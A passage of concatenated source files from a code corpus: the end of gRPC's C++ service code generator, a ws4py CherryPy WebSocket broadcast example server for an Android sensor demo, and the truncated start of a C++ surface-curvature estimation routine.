temp.append("template <class InMessage> class ServerReader;\n");
temp.append("template <class OutMessage> class ClientAsyncWriter;\n");
temp.append("template <class OutMessage, class InMessage> class ServerAsyncReader;\n");
}
if (HasServerOnlyStreaming(file)) {
temp.append("template <class InMessage> class ClientReader;\n");
temp.append("template <class OutMessage> class ServerWriter;\n");
temp.append("template <class OutMessage> class ClientAsyncReader;\n");
temp.append("template <class InMessage> class ServerAsyncWriter;\n");
}
if (HasBidiStreaming(file)) {
temp.append(
"template <class OutMessage, class InMessage>\n"
"class ClientReaderWriter;\n");
temp.append(
"template <class OutMessage, class InMessage>\n"
"class ServerReaderWriter;\n");
temp.append(
"template <class OutMessage, class InMessage>\n"
"class ClientAsyncReaderWriter;\n");
temp.append(
"template <class OutMessage, class InMessage>\n"
"class ServerAsyncReaderWriter;\n");
}
temp.append("} // namespace grpc\n");
return temp;
}
std::string GetSourceIncludes() {
return "#include <grpc++/async_unary_call.h>\n"
"#include <grpc++/channel_interface.h>\n"
"#include <grpc++/impl/client_unary_call.h>\n"
"#include <grpc++/impl/rpc_method.h>\n"
"#include <grpc++/impl/rpc_service_method.h>\n"
"#include <grpc++/impl/service_type.h>\n"
"#include <grpc++/stream.h>\n";
}
void PrintHeaderClientMethod(google::protobuf::io::Printer *printer,
const google::protobuf::MethodDescriptor *method,
std::map<std::string, std::string> *vars) {
(*vars)["Method"] = method->name();
(*vars)["Request"] =
grpc_cpp_generator::ClassName(method->input_type(), true);
(*vars)["Response"] =
grpc_cpp_generator::ClassName(method->output_type(), true);
if (NoStreaming(method)) {
printer->Print(*vars,
"::grpc::Status $Method$(::grpc::ClientContext* context, "
"const $Request$& request, $Response$* response);\n");
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientAsyncResponseReader< $Response$>> "
"$Method$(::grpc::ClientContext* context, "
"const $Request$& request, "
"::grpc::CompletionQueue* cq, void* tag);\n");
} else if (ClientOnlyStreaming(method)) {
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientWriter< $Request$>> $Method$("
"::grpc::ClientContext* context, $Response$* response);\n");
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientAsyncWriter< $Request$>> $Method$("
"::grpc::ClientContext* context, $Response$* response, "
"::grpc::CompletionQueue* cq, void* tag);\n");
} else if (ServerOnlyStreaming(method)) {
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientReader< $Response$>> $Method$("
"::grpc::ClientContext* context, const $Request$& request);\n");
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientAsyncReader< $Response$>> $Method$("
"::grpc::ClientContext* context, const $Request$& request, "
"::grpc::CompletionQueue* cq, void* tag);\n");
} else if (BidiStreaming(method)) {
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientReaderWriter< $Request$, $Response$>> "
"$Method$(::grpc::ClientContext* context);\n");
printer->Print(*vars,
"std::unique_ptr< ::grpc::ClientAsyncReaderWriter< "
"$Request$, $Response$>> "
"$Method$(::grpc::ClientContext* context, "
"::grpc::CompletionQueue* cq, void* tag);\n");
}
}
void PrintHeaderServerMethodSync(
google::protobuf::io::Printer *printer,
const google::protobuf::MethodDescriptor *method,
std::map<std::string, std::string> *vars) {
(*vars)["Method"] = method->name();
(*vars)["Request"] =
grpc_cpp_generator::ClassName(method->input_type(), true);
(*vars)["Response"] =
grpc_cpp_generator::ClassName(method->output_type(), true);
if (NoStreaming(method)) {
printer->Print(*vars,
"virtual ::grpc::Status $Method$("
"::grpc::ServerContext* context, const $Request$* request, "
"$Response$* response);\n");
} else if (ClientOnlyStreaming(method)) {
printer->Print(*vars,
"virtual ::grpc::Status $Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerReader< $Request$>* reader, "
"$Response$* response);\n");
} else if (ServerOnlyStreaming(method)) {
printer->Print(*vars,
"virtual ::grpc::Status $Method$("
"::grpc::ServerContext* context, const $Request$* request, "
"::grpc::ServerWriter< $Response$>* writer);\n");
} else if (BidiStreaming(method)) {
printer->Print(
*vars,
"virtual ::grpc::Status $Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerReaderWriter< $Response$, $Request$>* stream);"
"\n");
}
}
void PrintHeaderServerMethodAsync(
google::protobuf::io::Printer *printer,
const google::protobuf::MethodDescriptor *method,
std::map<std::string, std::string> *vars) {
(*vars)["Method"] = method->name();
(*vars)["Request"] =
grpc_cpp_generator::ClassName(method->input_type(), true);
(*vars)["Response"] =
grpc_cpp_generator::ClassName(method->output_type(), true);
if (NoStreaming(method)) {
printer->Print(*vars,
"void Request$Method$("
"::grpc::ServerContext* context, $Request$* request, "
"::grpc::ServerAsyncResponseWriter< $Response$>* response, "
"::grpc::CompletionQueue* cq, void *tag);\n");
} else if (ClientOnlyStreaming(method)) {
printer->Print(*vars,
"void Request$Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerAsyncReader< $Response$, $Request$>* reader, "
"::grpc::CompletionQueue* cq, void *tag);\n");
} else if (ServerOnlyStreaming(method)) {
printer->Print(*vars,
"void Request$Method$("
"::grpc::ServerContext* context, $Request$* request, "
"::grpc::ServerAsyncWriter< $Response$>* writer, "
"::grpc::CompletionQueue* cq, void *tag);\n");
} else if (BidiStreaming(method)) {
printer->Print(
*vars,
"void Request$Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerAsyncReaderWriter< $Response$, $Request$>* stream, "
"::grpc::CompletionQueue* cq, void *tag);\n");
}
}
void PrintHeaderService(google::protobuf::io::Printer *printer,
const google::protobuf::ServiceDescriptor *service,
std::map<std::string, std::string> *vars) {
(*vars)["Service"] = service->name();
printer->Print(*vars,
"class $Service$ GRPC_FINAL {\n"
" public:\n");
printer->Indent();
// Client side
printer->Print(
"class Stub GRPC_FINAL : public ::grpc::InternalStub {\n"
" public:\n");
printer->Indent();
for (int i = 0; i < service->method_count(); ++i) {
PrintHeaderClientMethod(printer, service->method(i), vars);
}
printer->Outdent();
printer->Print("};\n");
printer->Print(
"static std::unique_ptr<Stub> NewStub(const std::shared_ptr< "
"::grpc::ChannelInterface>& "
"channel);\n");
printer->Print("\n");
// Server side - Synchronous
printer->Print(
"class Service : public ::grpc::SynchronousService {\n"
" public:\n");
printer->Indent();
printer->Print("Service() : service_(nullptr) {}\n");
printer->Print("virtual ~Service();\n");
for (int i = 0; i < service->method_count(); ++i) {
PrintHeaderServerMethodSync(printer, service->method(i), vars);
}
printer->Print("::grpc::RpcService* service() GRPC_OVERRIDE GRPC_FINAL;\n");
printer->Outdent();
printer->Print(
" private:\n"
" ::grpc::RpcService* service_;\n");
printer->Print("};\n");
// Server side - Asynchronous
printer->Print(
"class AsyncService GRPC_FINAL : public ::grpc::AsynchronousService {\n"
" public:\n");
printer->Indent();
(*vars)["MethodCount"] = as_string(service->method_count());
printer->Print("explicit AsyncService(::grpc::CompletionQueue* cq);\n");
printer->Print("~AsyncService() {};\n");
for (int i = 0; i < service->method_count(); ++i) {
PrintHeaderServerMethodAsync(printer, service->method(i), vars);
}
printer->Outdent();
printer->Print("};\n");
printer->Outdent();
printer->Print("};\n");
}
std::string GetHeaderServices(const google::protobuf::FileDescriptor *file) {
std::string output;
google::protobuf::io::StringOutputStream output_stream(&output);
google::protobuf::io::Printer printer(&output_stream, '$');
std::map<std::string, std::string> vars;
for (int i = 0; i < file->service_count(); ++i) {
PrintHeaderService(&printer, file->service(i), &vars);
printer.Print("\n");
}
return output;
}
void PrintSourceClientMethod(google::protobuf::io::Printer *printer,
const google::protobuf::MethodDescriptor *method,
std::map<std::string, std::string> *vars) {
(*vars)["Method"] = method->name();
(*vars)["Request"] =
grpc_cpp_generator::ClassName(method->input_type(), true);
(*vars)["Response"] =
grpc_cpp_generator::ClassName(method->output_type(), true);
if (NoStreaming(method)) {
printer->Print(*vars,
"::grpc::Status $Service$::Stub::$Method$("
"::grpc::ClientContext* context, "
"const $Request$& request, $Response$* response) {\n");
printer->Print(*vars,
" return ::grpc::BlockingUnaryCall(channel(),"
"::grpc::RpcMethod($Service$_method_names[$Idx$]), "
"context, request, response);\n"
"}\n\n");
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientAsyncResponseReader< $Response$>> "
"$Service$::Stub::$Method$(::grpc::ClientContext* context, "
"const $Request$& request, "
"::grpc::CompletionQueue* cq, void* tag) {\n");
printer->Print(*vars,
" return std::unique_ptr< "
"::grpc::ClientAsyncResponseReader< $Response$>>(new "
"::grpc::ClientAsyncResponseReader< $Response$>("
"channel(), cq, "
"::grpc::RpcMethod($Service$_method_names[$Idx$]), "
"context, request, tag));\n"
"}\n\n");
} else if (ClientOnlyStreaming(method)) {
printer->Print(*vars,
"std::unique_ptr< ::grpc::ClientWriter< $Request$>> "
"$Service$::Stub::$Method$("
"::grpc::ClientContext* context, $Response$* response) {\n");
printer->Print(*vars,
" return std::unique_ptr< ::grpc::ClientWriter< "
"$Request$>>(new ::grpc::ClientWriter< $Request$>("
"channel(),"
"::grpc::RpcMethod($Service$_method_names[$Idx$], "
"::grpc::RpcMethod::RpcType::CLIENT_STREAMING), "
"context, response));\n"
"}\n\n");
printer->Print(*vars,
"std::unique_ptr< ::grpc::ClientAsyncWriter< $Request$>> "
"$Service$::Stub::$Method$("
"::grpc::ClientContext* context, $Response$* response, "
"::grpc::CompletionQueue* cq, void* tag) {\n");
printer->Print(*vars,
" return std::unique_ptr< ::grpc::ClientAsyncWriter< "
"$Request$>>(new ::grpc::ClientAsyncWriter< $Request$>("
"channel(), cq, "
"::grpc::RpcMethod($Service$_method_names[$Idx$], "
"::grpc::RpcMethod::RpcType::CLIENT_STREAMING), "
"context, response, tag));\n"
"}\n\n");
} else if (ServerOnlyStreaming(method)) {
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientReader< $Response$>> "
"$Service$::Stub::$Method$("
"::grpc::ClientContext* context, const $Request$& request) {\n");
printer->Print(*vars,
" return std::unique_ptr< ::grpc::ClientReader< "
"$Response$>>(new ::grpc::ClientReader< $Response$>("
"channel(),"
"::grpc::RpcMethod($Service$_method_names[$Idx$], "
"::grpc::RpcMethod::RpcType::SERVER_STREAMING), "
"context, request));\n"
"}\n\n");
printer->Print(*vars,
"std::unique_ptr< ::grpc::ClientAsyncReader< $Response$>> "
"$Service$::Stub::$Method$("
"::grpc::ClientContext* context, const $Request$& request, "
"::grpc::CompletionQueue* cq, void* tag) {\n");
printer->Print(*vars,
" return std::unique_ptr< ::grpc::ClientAsyncReader< "
"$Response$>>(new ::grpc::ClientAsyncReader< $Response$>("
"channel(), cq, "
"::grpc::RpcMethod($Service$_method_names[$Idx$], "
"::grpc::RpcMethod::RpcType::SERVER_STREAMING), "
"context, request, tag));\n"
"}\n\n");
} else if (BidiStreaming(method)) {
printer->Print(
*vars,
"std::unique_ptr< ::grpc::ClientReaderWriter< $Request$, $Response$>> "
"$Service$::Stub::$Method$(::grpc::ClientContext* context) {\n");
printer->Print(*vars,
" return std::unique_ptr< ::grpc::ClientReaderWriter< "
"$Request$, $Response$>>(new ::grpc::ClientReaderWriter< "
"$Request$, $Response$>("
"channel(),"
"::grpc::RpcMethod($Service$_method_names[$Idx$], "
"::grpc::RpcMethod::RpcType::BIDI_STREAMING), "
"context));\n"
"}\n\n");
printer->Print(*vars,
"std::unique_ptr< ::grpc::ClientAsyncReaderWriter< "
"$Request$, $Response$>> "
"$Service$::Stub::$Method$(::grpc::ClientContext* context, "
"::grpc::CompletionQueue* cq, void* tag) {\n");
printer->Print(*vars,
" return std::unique_ptr< ::grpc::ClientAsyncReaderWriter< "
"$Request$, $Response$>>(new "
"::grpc::ClientAsyncReaderWriter< $Request$, $Response$>("
"channel(), cq, "
"::grpc::RpcMethod($Service$_method_names[$Idx$], "
"::grpc::RpcMethod::RpcType::BIDI_STREAMING), "
"context, tag));\n"
"}\n\n");
}
}
void PrintSourceServerMethod(google::protobuf::io::Printer *printer,
const google::protobuf::MethodDescriptor *method,
std::map<std::string, std::string> *vars) {
(*vars)["Method"] = method->name();
(*vars)["Request"] =
grpc_cpp_generator::ClassName(method->input_type(), true);
(*vars)["Response"] =
grpc_cpp_generator::ClassName(method->output_type(), true);
if (NoStreaming(method)) {
printer->Print(*vars,
"::grpc::Status $Service$::Service::$Method$("
"::grpc::ServerContext* context, "
"const $Request$* request, $Response$* response) {\n");
printer->Print(
" return ::grpc::Status("
"::grpc::StatusCode::UNIMPLEMENTED);\n");
printer->Print("}\n\n");
} else if (ClientOnlyStreaming(method)) {
printer->Print(*vars,
"::grpc::Status $Service$::Service::$Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerReader< $Request$>* reader, "
"$Response$* response) {\n");
printer->Print(
" return ::grpc::Status("
"::grpc::StatusCode::UNIMPLEMENTED);\n");
printer->Print("}\n\n");
} else if (ServerOnlyStreaming(method)) {
printer->Print(*vars,
"::grpc::Status $Service$::Service::$Method$("
"::grpc::ServerContext* context, "
"const $Request$* request, "
"::grpc::ServerWriter< $Response$>* writer) {\n");
printer->Print(
" return ::grpc::Status("
"::grpc::StatusCode::UNIMPLEMENTED);\n");
printer->Print("}\n\n");
} else if (BidiStreaming(method)) {
printer->Print(*vars,
"::grpc::Status $Service$::Service::$Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerReaderWriter< $Response$, $Request$>* "
"stream) {\n");
printer->Print(
" return ::grpc::Status("
"::grpc::StatusCode::UNIMPLEMENTED);\n");
printer->Print("}\n\n");
}
}
void PrintSourceServerAsyncMethod(
google::protobuf::io::Printer *printer,
const google::protobuf::MethodDescriptor *method,
std::map<std::string, std::string> *vars) {
(*vars)["Method"] = method->name();
(*vars)["Request"] =
grpc_cpp_generator::ClassName(method->input_type(), true);
(*vars)["Response"] =
grpc_cpp_generator::ClassName(method->output_type(), true);
if (NoStreaming(method)) {
printer->Print(*vars,
"void $Service$::AsyncService::Request$Method$("
"::grpc::ServerContext* context, "
"$Request$* request, "
"::grpc::ServerAsyncResponseWriter< $Response$>* response, "
"::grpc::CompletionQueue* cq, void* tag) {\n");
printer->Print(
*vars,
" AsynchronousService::RequestAsyncUnary($Idx$, context, request, response, cq, tag);\n");
printer->Print("}\n\n");
} else if (ClientOnlyStreaming(method)) {
printer->Print(*vars,
"void $Service$::AsyncService::Request$Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerAsyncReader< $Response$, $Request$>* reader, "
"::grpc::CompletionQueue* cq, void* tag) {\n");
printer->Print(
*vars,
" AsynchronousService::RequestClientStreaming($Idx$, context, reader, cq, tag);\n");
printer->Print("}\n\n");
} else if (ServerOnlyStreaming(method)) {
printer->Print(*vars,
"void $Service$::AsyncService::Request$Method$("
"::grpc::ServerContext* context, "
"$Request$* request, "
"::grpc::ServerAsyncWriter< $Response$>* writer, "
"::grpc::CompletionQueue* cq, void* tag) {\n");
printer->Print(
*vars,
" AsynchronousService::RequestServerStreaming($Idx$, context, request, writer, cq, tag);\n");
printer->Print("}\n\n");
} else if (BidiStreaming(method)) {
printer->Print(
*vars,
"void $Service$::AsyncService::Request$Method$("
"::grpc::ServerContext* context, "
"::grpc::ServerAsyncReaderWriter< $Response$, $Request$>* stream, "
"::grpc::CompletionQueue* cq, void *tag) {\n");
printer->Print(
*vars,
" AsynchronousService::RequestBidiStreaming($Idx$, context, stream, cq, tag);\n");
printer->Print("}\n\n");
}
}
void PrintSourceService(google::protobuf::io::Printer *printer,
const google::protobuf::ServiceDescriptor *service,
std::map<std::string, std::string> *vars) {
(*vars)["Service"] = service->name();
printer->Print(*vars, "static const char* $Service$_method_names[] = {\n");
for (int i = 0; i < service->method_count(); ++i) {
(*vars)["Method"] = service->method(i)->name();
printer->Print(*vars, " \"/$Package$$Service$/$Method$\",\n");
}
printer->Print(*vars, "};\n\n");
printer->Print(
*vars,
"std::unique_ptr< $Service$::Stub> $Service$::NewStub("
"const std::shared_ptr< ::grpc::ChannelInterface>& channel) {\n"
" std::unique_ptr< $Service$::Stub> stub(new $Service$::Stub());\n"
" stub->set_channel(channel);\n"
" return stub;\n"
"}\n\n");
for (int i = 0; i < service->method_count(); ++i) {
(*vars)["Idx"] = as_string(i);
PrintSourceClientMethod(printer, service->method(i), vars);
}
(*vars)["MethodCount"] = as_string(service->method_count());
printer->Print(
*vars,
"$Service$::AsyncService::AsyncService(::grpc::CompletionQueue* cq) : "
"::grpc::AsynchronousService(cq, $Service$_method_names, $MethodCount$) "
"{}\n\n");
printer->Print(*vars,
"$Service$::Service::~Service() {\n"
" delete service_;\n"
"}\n\n");
for (int i = 0; i < service->method_count(); ++i) {
(*vars)["Idx"] = as_string(i);
PrintSourceServerMethod(printer, service->method(i), vars);
PrintSourceServerAsyncMethod(printer, service->method(i), vars);
}
printer->Print(*vars,
"::grpc::RpcService* $Service$::Service::service() {\n");
printer->Indent();
printer->Print(
"if (service_ != nullptr) {\n"
" return service_;\n"
"}\n");
printer->Print("service_ = new ::grpc::RpcService();\n");
for (int i = 0; i < service->method_count(); ++i) {
const google::protobuf::MethodDescriptor *method = service->method(i);
(*vars)["Idx"] = as_string(i);
(*vars)["Method"] = method->name();
(*vars)["Request"] =
grpc_cpp_generator::ClassName(method->input_type(), true);
(*vars)["Response"] =
grpc_cpp_generator::ClassName(method->output_type(), true);
if (NoStreaming(method)) {
printer->Print(
*vars,
"service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
" $Service$_method_names[$Idx$],\n"
" ::grpc::RpcMethod::NORMAL_RPC,\n"
" new ::grpc::RpcMethodHandler< $Service$::Service, $Request$, "
"$Response$>(\n"
" std::function< ::grpc::Status($Service$::Service*, "
"::grpc::ServerContext*, const $Request$*, $Response$*)>("
"&$Service$::Service::$Method$), this),\n"
" new $Request$, new $Response$));\n");
} else if (ClientOnlyStreaming(method)) {
printer->Print(
*vars,
"service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
" $Service$_method_names[$Idx$],\n"
" ::grpc::RpcMethod::CLIENT_STREAMING,\n"
" new ::grpc::ClientStreamingHandler< "
"$Service$::Service, $Request$, $Response$>(\n"
" std::function< ::grpc::Status($Service$::Service*, "
"::grpc::ServerContext*, "
"::grpc::ServerReader< $Request$>*, $Response$*)>("
"&$Service$::Service::$Method$), this),\n"
" new $Request$, new $Response$));\n");
} else if (ServerOnlyStreaming(method)) {
printer->Print(
*vars,
"service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
" $Service$_method_names[$Idx$],\n"
" ::grpc::RpcMethod::SERVER_STREAMING,\n"
" new ::grpc::ServerStreamingHandler< "
"$Service$::Service, $Request$, $Response$>(\n"
" std::function< ::grpc::Status($Service$::Service*, "
"::grpc::ServerContext*, "
"const $Request$*, ::grpc::ServerWriter< $Response$>*)>("
"&$Service$::Service::$Method$), this),\n"
" new $Request$, new $Response$));\n");
} else if (BidiStreaming(method)) {
printer->Print(
*vars,
"service_->AddMethod(new ::grpc::RpcServiceMethod(\n"
" $Service$_method_names[$Idx$],\n"
" ::grpc::RpcMethod::BIDI_STREAMING,\n"
" new ::grpc::BidiStreamingHandler< "
"$Service$::Service, $Request$, $Response$>(\n"
" std::function< ::grpc::Status($Service$::Service*, "
"::grpc::ServerContext*, "
"::grpc::ServerReaderWriter< $Response$, $Request$>*)>("
"&$Service$::Service::$Method$), this),\n"
" new $Request$, new $Response$));\n");
}
}
printer->Print("return service_;\n");
printer->Outdent();
printer->Print("}\n\n");
}
std::string GetSourceServices(const google::protobuf::FileDescriptor *file) {
std::string output;
google::protobuf::io::StringOutputStream output_stream(&output);
google::protobuf::io::Printer printer(&output_stream, '$');
std::map<std::string, std::string> vars;
// Package string is empty or ends with a dot. It is used to fully qualify
// method names.
vars["Package"] = file->package();
if (!file->package().empty()) {
vars["Package"].append(".");
}
for (int i = 0; i < file->service_count(); ++i) {
PrintSourceService(&printer, file->service(i), &vars);
printer.Print("\n");
}
return output;
}
} // namespace grpc_cpp_generator
| chenbaihu/grpc | src/compiler/cpp_generator.cc | C++ | bsd-3-clause | 30,007 |
# -*- coding: utf-8 -*-
import os.path
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.server.handler.threadedhandler import WebSocketHandler, EchoWebSocketHandler
class BroadcastWebSocketHandler(WebSocketHandler):
def received_message(self, m):
cherrypy.engine.publish('websocket-broadcast', str(m))
class Root(object):
@cherrypy.expose
def index(self):
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>WebSocket example displaying Android device sensors</title>
<link rel="stylesheet" href="/css/style.css" type="text/css" />
<script type="application/javascript" src="/js/jquery-1.6.2.min.js"> </script>
<script type="application/javascript" src="/js/jcanvas.min.js"> </script>
<script type="application/javascript" src="/js/droidsensor.js"> </script>
<script type="application/javascript">
$(document).ready(function() {
initWebSocket();
drawAll();
});
</script>
</head>
<body>
<section id="content" class="body">
<canvas id="canvas" width="900" height="620"></canvas>
</section>
</body>
</html>
"""
@cherrypy.expose
def ws(self):
cherrypy.log("Handler created: %s" % repr(cherrypy.request.ws_handler))
if __name__ == '__main__':
cherrypy.config.update({
'server.socket_host': '0.0.0.0',
'server.socket_port': 9000,
'tools.staticdir.root': os.path.abspath(os.path.join(os.path.dirname(__file__), 'static'))
}
)
print os.path.abspath(os.path.join(__file__, 'static'))
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
cherrypy.quickstart(Root(), '', config={
'/js': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'js'
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'css'
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'images'
},
'/ws': {
'tools.websocket.on': True,
'tools.websocket.handler_cls': BroadcastWebSocketHandler
}
}
)
| progrium/WebSocket-for-Python | example/droid_sensor_cherrypy_server.py | Python | bsd-3-clause | 2,324 |
// File: curvature.cc
// Abstract: determine curvature of surface points on binary volume
//
// ref. Tracing Surfaces for Surfacing Traces
// Sander & Zucker
//
// ref. Surface Parameterization and Curvature Measurement
// of Arbitrary 3-D Objects: Five Pratical Methods
// Stokely and Wu, PAMI vol. 14, 1992
//
// Created: 02/24/98 by: Chris L. Wyatt
// Modified: 10/09/2001 by: Hong Li
//
//
#include "curvature.hh"
#include <fstream>
#include <cstdio>
#ifndef NDEBUG
#define NDEBUG
#endif
#include "constant.h"
//Before using the function, check the normal vector validity
int curvature(Vertex_with_Features & vert, std::slist<Vertex_with_Features *>
nblist, double &cond, int DB, Volume_ext<unsigned short> & volume_ext, float
&g, float & m)
{
std::slist<Vertex_with_Features *>::iterator nbiter;
int i;
double Ay, Az, dx, dy, dz;
double sum11, sum12, sum13, sum22, sum23, sum33;
double a, b, c;
mvVec3f ip;
mvVec3f neighbors[MAX_NEIGHBORS];
double **ATA, **ATAInv;
int numn = 0;
mvVec3f norm = vert.getNormDir();
Az = gzangle(norm);
norm = (norm.zRotate(-Az));
Ay = gyangle(norm);
norm = (norm.yRotate(-Ay));
nbiter = nblist.begin();
while(nbiter != nblist.end())
{
ip.x = -vert.getPX()+ (*nbiter)->getPX();
ip.y = -vert.getPY()+ (*nbiter)->getPY();
ip.z = -vert.getPZ()+ (*nbiter)->getPZ();
ip = (ip.zRotate(-Az));
ip = (ip.yRotate(-Ay));
neighbors[numn++] = ip;
nbiter++;
}
ATA = matrix<double>(1, 3, 1, 3);
ATAInv = matrix<double>(1, 3, 1, 3);
sum11 = 0; sum12 = 0; sum13 = 0;
sum22 = 0; sum23 = 0; sum33 = 0;
for (i=0; i<numn; i++){
dx = (double)neighbors[i].x;
dy = (double)neighbors[i].y;
sum11 += dx*dx*dx*dx;
sum12 += dx*dx*2*dx*dy;
sum13 += dx*dx*dy*dy;
sum22 += 2*dx*dy*2*dx*dy;
sum23 += 2*dx*dy*dy*dy;
sum33 += dy*dy*dy*dy;
}
ATA[1][1] = sum11;
ATA[1][2] = sum12;
ATA[1][3] = sum13;
ATA[2][1] = sum12;
ATA[2][2] = sum22;
ATA[2][3] = sum23;
ATA[3][1] = sum13;
ATA[3][2] = sum23;
ATA[3][3] = sum33;
invertMatrixSVD(ATA, ATAInv, 3, cond);
sum11 = sum12 = sum13 = 0;
for (i=0; i<numn; i++){
dx = (double)neighbors[i].x;
dy = (double)neighbors[i].y;
dz = (double)neighbors[i].z;
sum11 += dx*dx*dz;
sum12 += 2*dx*dy*dz;
sum13 += dy*dy*dz;
}
a = ATAInv[1][1]*sum11 + ATAInv[1][2]*sum12 + ATAInv[1][3]*sum13;
b = ATAInv[2][1]*sum11 + ATAInv[2][2]*sum12 + ATAInv[2][3]*sum13;
c = ATAInv[3][1]*sum11 + ATAInv[3][2]*sum12 + ATAInv[3][3]*sum13;
#ifdef NDEBUG
if (DB ==1)
{
ofstream outfile, outfile1, outfile2,outfile3, outfile4;
char sout[80];
outfile1.open ("mesh1.off", ofstream::out | ofstream::app);
cout<<numn<<endl;
for (i=0; i<numn; i++){
sprintf(sout, "%f %f %f ",neighbors[i].x,
neighbors[i].y,neighbors[i].z);
outfile1<<sout<<endl;
}
cout << " a = "<< a <<" b = "<< b << " c = "<< c <<endl;
float dy = 0.25; //mm
float dz = 0.25; //mm
outfile2.open ("mesh2.mesh"); //transforemed mesh
outfile2 <<"CMESH" <<endl;
outfile2 <<"200 200" <<endl;
outfile3.open ("mesh3.mesh"); //untransformed mesh
outfile3 <<"CMESH" <<endl;
outfile3 <<"200 200" <<endl;
float x,y,z,v;
// float xorig, yorig, zorig, xs,ys,zs;
// volume_ext.getOrigin(xorig,yorig,zorig);
// volume_ext.getVoxelSpacing(xs,ys,zs);
// cout << "xo= "<<xorig<<" yo= "<<yorig<<" zo= "<<zorig<<
// "dx = "<<xs<<" dy= "<<ys<<" dz = "<<zs<<endl;
// xorig = yorig=xorig = 0; //for start in voxel
mvVec3f temp;
for (i = -100; i< 100; i++)
{
for (int j=-100;j<100;j++)
{
outfile2<< "0 "<< j*dy << " " <<i*dz<<" 1 0 0 1 ";
temp = mvVec3f(0, j*dy, i*dz);
temp = temp.yRotate(Ay);
temp = temp.zRotate(Az);
x = vert.getPX()+temp.x;
y = vert.getPY()+temp.y;
z = vert.getPZ()+temp.z;
v = volume_ext.getValue(x,y,z);
//cout <<"v = "<<v<<endl;
if (v>=1500) v = 1;
else v = v/1500;
outfile3<< x << " "<<y << " " <<z<<" "<<v<<" "<<v<<" "<<v<<" 1 ";
}
outfile2<<endl;
outfile3<<endl;
}
temp = temp.crossProduct( vert.getNormDir());
mvVec3f parallel = (vert.getNormDir()).crossProduct(temp);
parallel.normalize();
outfile4.open ("stop.vect"); //untransformed mesh
outfile4 <<"VECT" <<endl;
outfile4 <<"1 2 1"<<endl;
outfile4 <<"2"<<endl;
outfile4 <<"1"<<endl;
x = vert.getPX();
y = vert.getPY();
z = vert.getPZ();
mvVec3f curv = mvVec3f(x,y,z);
temp = vert.getNormDir();
curv = curv + temp * vert.getThickness();
/*float tempv = volume_ext.getValue(curv.x,curv.y,curv.z);
int turn = 0;
for (i = 0; i < 100; i++)
{
curv += temp * 0.25;
v = volume_ext.getValue(curv.x,curv.y,curv.z);
if ( v - 1024 > 60)
{
cout << v <<" Larger than 60 at "<< i*0.25 <<" mm" <<endl;
break;
}
if ( turn ==1 && v-1024 < -425)
{
cout << v <<" Lower than -425 at "<< i*0.25 <<" mm"<<endl;
break;
}
if ( turn == 1 && v > tempv)
{
cout << "turning at "<< i*0.25 <<" mm" <<endl;
break;
}
if ( v < tempv) turn = 1;
tempv = v;
}*/
mvVec3f from = curv - parallel * 2;
mvVec3f to = curv + parallel * 2;
outfile4 <<from.x <<" "<<from.y<<" "<<from.z<<" "<<
to.x<<" "<<to.y<<" "<<to.z<<endl;
outfile4 <<"1 1 0 1"<<endl;
outfile1.close();
outfile2.close();
outfile3.close();
outfile4.close();
}
#endif
free_matrix(ATA, 1, 3, 1, 3);
free_matrix(ATAInv, 1, 3, 1, 3);
g= 4*(a*c - b*b);
m= a + c;
}
//Before using the function, check the normal vector validity
int curvature(Vertex_with_Features & vert, std::slist<Vertex_with_Features *> nblist, float &g, float & m)
{
std::slist<Vertex_with_Features *>::iterator nbiter;
int i;
double Ay, Az, dx, dy, dz;
double sum11, sum12, sum13, sum22, sum23, sum33;
double a, b, c;
mvVec3f ip;
mvVec3f neighbors[MAX_NEIGHBORS];
double **ATA, **ATAInv;
double cond;
int numn = 0;
mvVec3f norm = vert.getNormDir();
Az = gzangle(norm);
norm = (norm.zRotate(-Az));
Ay = gyangle(norm);
norm = (norm.yRotate(-Ay));
nbiter = nblist.begin();
while(nbiter != nblist.end())
{
ip.x = -vert.getPX()+ (*nbiter)->getPX();
ip.y = -vert.getPY()+ (*nbiter)->getPY();
ip.z = -vert.getPZ()+ (*nbiter)->getPZ();
ip = (ip.zRotate(-Az));
ip = (ip.yRotate(-Ay));
neighbors[numn++] = ip;
nbiter++;
}
ATA = matrix<double>(1, 3, 1, 3);
ATAInv = matrix<double>(1, 3, 1, 3);
sum11 = 0; sum12 = 0; sum13 = 0;
sum22 = 0; sum23 = 0; sum33 = 0;
for (i=0; i<numn; i++){
dx = (double)neighbors[i].x;
dy = (double)neighbors[i].y;
sum11 += dx*dx*dx*dx;
sum12 += dx*dx*2*dx*dy;
sum13 += dx*dx*dy*dy;
sum22 += 2*dx*dy*2*dx*dy;
sum23 += 2*dx*dy*dy*dy;
sum33 += dy*dy*dy*dy;
}
ATA[1][1] = sum11;
ATA[1][2] = sum12;
ATA[1][3] = sum13;
ATA[2][1] = sum12;
ATA[2][2] = sum22;
ATA[2][3] = sum23;
ATA[3][1] = sum13;
ATA[3][2] = sum23;
ATA[3][3] = sum33;
invertMatrixSVD(ATA, ATAInv, 3, cond);
sum11 = sum12 = sum13 = 0;
for (i=0; i<numn; i++){
dx = (double)neighbors[i].x;
dy = (double)neighbors[i].y;
